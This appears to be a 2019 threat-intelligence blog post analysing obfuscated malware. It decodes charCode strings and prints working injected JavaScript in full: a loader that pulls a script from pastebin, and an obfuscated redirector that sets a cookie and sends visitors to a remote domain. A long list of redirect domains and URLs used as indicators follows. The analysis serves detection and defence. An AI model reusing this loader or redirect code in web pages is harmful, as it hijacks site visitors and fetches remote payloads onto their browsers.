Analysis of Obfuscated PHP Malware

#Threat Intelligence #Threat Hunting #PHP #Malware Analysis

Updated on February 27, 2019.

I am monitoring the php decoder site here and was alerted when the decoded php here had a String.fromCharCode command in it. After decoding the character code (104, 116, 116, 112, 115, 58, 47, 47, 103, 101, 116, 109, 121, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 103, 101, 116, 46, 112, 104, 112), this produced https://getmyconfigplease[.]com/get[.]php. The content of this site looks like:

var sECIQY8TzC = document.createElement('script'); sECIQY8TzC.type = 'text/javascript'; sECIQY8TzC.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 69, 110, 78, 75, 113, 71, 76, 78); document.head.appendChild(sECIQY8TzC);

Decoding the String.fromCharCode bit produces https://pastebin.com/raw/EnNKqGLN.

The content of this site is:

function _0x16ac9e(){var _0x11da69=['MHgy','MHgz','MHg0','MHg2','aHJlZg==','cmVwbGFjZQ==','bG9jYXRpb24=','aW5kZXhPZg==','Y29va2ll','QmVzdENvb2tpZT10cnVlOyBtYXgtYWdlPTIwNDAw','c2hpZnQ=','MHgw','MHgx'];(function(_0x538417,_0x48f8ea){var _0x350dbc=function(_0x2e576b){while(--_0x2e576b){_0x538417['push'](_0x538417['shift']());}};_0x350dbc(++_0x48f8ea);}(_0x11da69,0xd5));var _0x4097a7=function(_0x506a3d,_0x321114){_0x506a3d=_0x506a3d-0x0;var _0x32b6f7=_0x11da69[_0x506a3d];if(_0x4097a7['cNcBaR']===undefined){(function(){var _0x29eb7d;try{var _0x4e84d1=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x29eb7d=_0x4e84d1();}catch(_0x476c5c){_0x29eb7d=window;}var _0x3b1078='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x29eb7d['atob']||(_0x29eb7d['atob']=function(_0x2199f9){var _0x207876=String(_0x2199f9)['replace'](/=+$/,'');for(var _0x3d686c=0x0,_0x55acec,_0x22a388,_0x5795eb=0x0,_0x5c30ef='';_0x22a388=_0x207876['charAt'](_0x5795eb++);~_0x22a388&&(_0x55acec=_0x3d686c%0x4?_0x55acec*0x40+_0x22a388:_0x22a388,_0x3d686c++%0x4)?_0x5c30ef+=String['fromCharCode'](0xff&_0x55acec>>(-0x2*_0x3d686c&0x6)):0x0){_0x22a388=_0x3b1078['indexOf'](_0x22a388);}return _0x5c30ef;});}());_0x4097a7['qogRBP']=function(_0xd61dcf){var _0x10ae9e=atob(_0xd61dcf);var _0x3a9531=[];for(var _0x3a6320=0x0,_0x8d019b=_0x10ae9e['length'];_0x3a6320<_0x8d019b;_0x3a6320++){_0x3a9531+='%'+('00'+_0x10ae9e['charCodeAt'](_0x3a6320)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x3a9531);};_0x4097a7['KYlgqs']={};_0x4097a7['cNcBaR']=!![];}var _0x579681=_0x4097a7['KYlgqs'][_0x506a3d];if(_0x579681===undefined){_0x32b6f7=_0x4097a7['qogRBP'](_0x32b6f7);_0x4097a7['KYlgqs'][_0x506a3d]=_0x32b6f7;}else{_0x32b6f7=_0x579681;}return _0x32b6f7;};var _0x2be368=[_0x4097a7('0x0'),_0x4097a7('0x1'),'fromCharCode','BestCookie=true',_0x4097a7('0x2'),_0x4097a7('0x3'),_0x4097a7('0x4')];(function(_0x6e5b15,_0x2c75a3){var _0x42951f=function(_0x1975b5){while(--_0x1975b5){_0x6e5b15['push'](_0x6e5b15[_0x4097a7('0x5')]());}};_0x42951f(++_0x2c75a3);}(_0x2be368,0x1c9));var _0x4755cb=function(_0x5ad1ee,_0x39c6df){_0x5ad1ee=_0x5ad1ee-0x0;var _0x38bd4b=_0x2be368[_0x5ad1ee];return _0x38bd4b;};var _0x443bde=[_0x4755cb(_0x4097a7('0x6')),_0x4755cb(_0x4097a7('0x7')),_0x4755cb(_0x4097a7('0x8')),_0x4755cb(_0x4097a7('0x9')),_0x4755cb(_0x4097a7('0xa')),_0x4755cb('0x5'),_0x4755cb(_0x4097a7('0xb')),_0x4097a7('0xc')];var _0x4efd8b=String[_0x443bde[0x0]](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x66,0x6f,0x72,0x6d,0x79,0x6c,0x69,0x74,0x74,0x6c,0x65,0x73,0x69,0x74,0x65,0x2e,0x78,0x79,0x7a,0x2f,0x6c,0x69,0x74,0x74,0x6c,0x65,0x2e,0x70,0x68,0x70);if(document[_0x443bde[0x3]][_0x443bde[0x2]](_0x443bde[0x1])==-0x1){document[_0x443bde[0x3]]=_0x443bde[0x4];window[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);document[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);window[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;document[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;}}_0x16ac9e();

Update (February 27, 2019)

The content below was added on February 27, 2019.

Upon further investigation, the code above contains the interesting snippet:

(0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x66,0x6f,0x72,0x6d,0x79,0x6c,0x69,0x74,0x74,0x6c,0x65,0x73,0x69,0x74,0x65,0x2e,0x78,0x79,0x7a,0x2f,0x6c,0x69,0x74,0x74,0x6c,0x65,0x2e,0x70,0x68,0x70)

This hex that decodes to:

https://formylittlesite.xyz/little.php

Visitors to this site will be redirected to a URL on one of the following domains (the full URLs are listed below):

appelertte.tk
atlanta-rostov.ru
avtonewsmir.ru
avtoservis5plus.ru
avtowoldsnews.ru
creditforms.site
edu-fddu.info
giner.online
greencool.icu
informzine.site
lentube.host
merkuriu.icu
picturesun.top
rriverrponse.tk
sarriverdoma.tk
school-fix-news.info
storics.info
studentachieve.tk
visnu.icu
www.twero.com

Here are the URLs to which I was redirected:

http://appelertte.tk/index/?8mMwj2&extra_param_1=261
http://appelertte.tk/index/?8mMwj2&extra_param_1=695
http://atlanta-rostov.ru/2018/12/26/ken-shamrock-vs-kimbo-slice-full-fight/
http://atlanta-rostov.ru/2018/12/27/rhythmbox-vs-banshee/
http://atlanta-rostov.ru/latest.php
http://avtonewsmir.ru/the-best-stock-photos/
http://avtoservis5plus.ru/main-credit-reporting-agencies/
http://avtowoldsnews.ru/forex-trading-for-dummies-2013-pdf/
http://avtowoldsnews.ru/latest.php
http://creditforms.site/average-car-insurance-rates-florida/
http://creditforms.site/latest.php
http://creditforms.site/the-carburetors/
http://edu-fddu.info/blog/latest.php
http://giner.online/can-you-apply-for-more-than-one-credit-card/
http://greencool.icu/blog/?p=502
http://greencool.icu/blog/latest.php
http://informzine.site/2018/12/26/papigfunk/
http://informzine.site/latest.php
http://lentube.host/forex-trading-tutorials/
http://lentube.host/latest.php
http://lentube.host/top-forex-traders-in-the-world-2017/
http://lentube.host/what-is-a-broker-forex-nu3p/
http://merkuriu.icu/blog/?p=446
http://picturesun.top/blog/?p=102
http://picturesun.top/blog/?p=104
http://picturesun.top/blog/?p=125
http://picturesun.top/blog/?p=13
http://picturesun.top/blog/?p=1348
http://picturesun.top/blog/?p=1357
http://picturesun.top/blog/?p=1382
http://picturesun.top/blog/?p=1416
http://picturesun.top/blog/?p=1444
http://picturesun.top/blog/?p=1485
http://picturesun.top/blog/?p=149
http://picturesun.top/blog/?p=1494
http://picturesun.top/blog/?p=1499
http://picturesun.top/blog/?p=1509
http://picturesun.top/blog/?p=1537
http://picturesun.top/blog/?p=1553
http://picturesun.top/blog/?p=156
http://picturesun.top/blog/?p=1566
http://picturesun.top/blog/?p=158
http://picturesun.top/blog/?p=1589
http://picturesun.top/blog/?p=1600
http://picturesun.top/blog/?p=1611
http://picturesun.top/blog/?p=1631
http://picturesun.top/blog/?p=1651
http://picturesun.top/blog/?p=1655
http://picturesun.top/blog/?p=1658
http://picturesun.top/blog/?p=1667
http://picturesun.top/blog/?p=1675
http://picturesun.top/blog/?p=1690
http://picturesun.top/blog/?p=1694
http://picturesun.top/blog/?p=174
http://picturesun.top/blog/?p=178
http://picturesun.top/blog/?p=18
http://picturesun.top/blog/?p=183
http://picturesun.top/blog/?p=209
http://picturesun.top/blog/?p=213
http://picturesun.top/blog/?p=226
http://picturesun.top/blog/?p=242
http://picturesun.top/blog/?p=252
http://picturesun.top/blog/?p=256
http://picturesun.top/blog/?p=268
http://picturesun.top/blog/?p=274
http://picturesun.top/blog/?p=280
http://picturesun.top/blog/?p=306
http://picturesun.top/blog/?p=312
http://picturesun.top/blog/?p=314
http://picturesun.top/blog/?p=334
http://picturesun.top/blog/?p=348
http://picturesun.top/blog/?p=354
http://picturesun.top/blog/?p=374
http://picturesun.top/blog/?p=376
http://picturesun.top/blog/?p=380
http://picturesun.top/blog/?p=382
http://picturesun.top/blog/?p=396
http://picturesun.top/blog/?p=404
http://picturesun.top/blog/?p=418
http://picturesun.top/blog/?p=426
http://picturesun.top/blog/?p=430
http://picturesun.top/blog/?p=448
http://picturesun.top/blog/?p=452
http://picturesun.top/blog/?p=458
http://picturesun.top/blog/?p=470
http://picturesun.top/blog/?p=476
http://picturesun.top/blog/?p=480
http://picturesun.top/blog/?p=484
http://picturesun.top/blog/?p=500
http://picturesun.top/blog/?p=513
http://picturesun.top/blog/?p=517
http://picturesun.top/blog/?p=523
http://picturesun.top/blog/?p=527
http://picturesun.top/blog/?p=529
http://picturesun.top/blog/?p=531
http://picturesun.top/blog/?p=537
http://picturesun.top/blog/?p=541
http://picturesun.top/blog/?p=543
http://picturesun.top/blog/?p=545
http://picturesun.top/blog/?p=551
http://picturesun.top/blog/?p=557
http://picturesun.top/blog/?p=565
http://picturesun.top/blog/?p=567
http://picturesun.top/blog/?p=569
http://picturesun.top/blog/?p=573
http://picturesun.top/blog/?p=575
http://picturesun.top/blog/?p=622
http://picturesun.top/blog/?p=86
http://picturesun.top/blog/?p=92
http://picturesun.top/blog/?p=96
http://picturesun.top/blog/latest.php
http://rriverrponse.tk/index/?8mMwj2&extra_param_1=695
http://sarriverdoma.tk/index/?8mMwj2&extra_param_1=695
http://school-fix-news.info/2019/01/09/car-accident-my-fault-will-my-insurance-go-up/
http://storics.info/2018/12/27/business-credit-cards-for-bad-credit/
http://storics.info/2018/12/27/cheapest-home-equity-line-of-credit/
http://storics.info/2018/12/27/paid-in-full-on-credit-report/
http://storics.info/2018/12/27/wipe-credit-clean/
http://storics.info/latest.php
http://visnu.icu/philadelphia-indemnity-car-insurance/
https://www.twero.com/en/profiles?p=1027797&pi=test1&_=1548965393

I intend to more investigation on the registrant information for these domains at some point and will keep you posted!